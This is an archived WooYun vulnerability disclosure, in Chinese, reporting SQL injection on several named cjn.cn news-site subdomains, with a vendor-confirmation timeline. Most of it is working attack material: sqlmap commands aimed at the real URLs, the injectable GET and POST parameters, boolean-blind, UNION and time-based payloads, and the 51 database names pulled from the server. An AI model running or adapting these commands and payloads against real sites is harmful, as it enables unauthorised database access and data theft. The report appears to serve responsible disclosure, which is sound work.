乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-21: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经确认,细节仅向厂商公开 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
既然来乌云注册了,能不能不要老是忽略漏洞?
注入点1:
http://mindiao.cjn.cn/guest_more.php?boardid=81
sqlmap.py -u "http://mindiao.cjn.cn/guest_more.php?boardid=81" --dbs
[22:08:21] [INFO] GET parameter 'boardid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectableGET parameter 'boardid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:---Parameter: boardid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: boardid=81 AND 3729=3729 Type: UNION query Title: Generic UNION query (NULL) - 19 columns Payload: boardid=81 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178706b71,0x6a457477756c575161796e5077736f446474776a48484b776657526f4457514543724e63714f6848,0x71626b7071),NULL,NULL,NULL,NULL-- ----[22:08:32] [INFO] testing MySQL[22:08:35] [INFO] confirming MySQL[22:08:37] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.27, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0[22:08:37] [INFO] fetching database namesavailable databases [51]:[*] #mysql50#cjntj.bak[*] #mysql50#cjnvote.bak[*] #mysql50#phpwind.bak[*] cc[*] ccvms[*] cjnphoto[*] cjnvote[*] collabtive[*] dwz[*] information_schema[*] maps[*] mingpai[*] mysql[*] myt[*] newdata_user[*] osfc[*] phpstat_mysql_10_mysql[*] phpstat_mysql_10_mysql_log[*] phpstat_mysql_1_mysql[*] phpstat_mysql_1_mysql_log[*] phpstat_mysql_2_mysql[*] phpstat_mysql_2_mysql_log[*] phpstat_mysql_3_mysql[*] phpstat_mysql_3_mysql_log[*] phpstat_mysql_4_mysql[*] phpstat_mysql_4_mysql_log[*] phpstat_mysql_5_mysql[*] phpstat_mysql_5_mysql_log[*] phpstat_mysql_6_mysql[*] phpstat_mysql_6_mysql_log[*] phpstat_mysql_7_mysql[*] phpstat_mysql_7_mysql_log[*] phpstat_mysql_8_mysql[*] phpstat_mysql_8_mysql_log[*] phpstat_mysql_9_mysql[*] phpstat_mysql_9_mysql_log[*] phpstat_mysql_mysql[*] phpstat_web[*] phpwind[*] phpwindcs[*] test[*] TriAquae[*] tweibo[*] veryvote[*] vsftpduser[*] wh4z[*] whwx[*] wordpress[*] xweibo[*] xweibo2x[*] zhenhao
51个数据库,应该是整站的了吧注入点2:
sqlmap.py -u "http://myt.cjn.cn/user/pf_login.php" --data "password=a&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=a" --dbs
跑出有两个数据库:
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 737 HTTP(s) requests:---Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=-9824' OR 4782=4782# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (comment) Payload: password=88952634&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=88952634' OR SLEEP(5)#---[22:24:30] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.27, PHP 5.2.17back-end DBMS: MySQL 5.0.12[22:24:30] [INFO] fetching database names[22:24:30] [INFO] fetching number of databases[22:24:30] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[22:24:30] [INFO] retrieved: 2[22:24:47] [INFO] retrieved: informa
太慢。。。注入点3:
sqlmap.py -u "http://t.cjn.cn/user/pf_login.php" --data "password=a&submit=%E7%AE%A1%E7%90%86%E7%99%BB%E5%BD%95&username=a" --dbs 存在POST sql注入漏洞
跑出来跟第二个注入点一样的结果 两个数据库 就不贴图了。
1.认真对待漏洞呀 既然来乌云注册了,不能老是忽略2.漏洞不止这些 请自查
危害等级:中
漏洞Rank:5
确认时间:2015-12-21 10:22
谢谢指出漏洞
暂无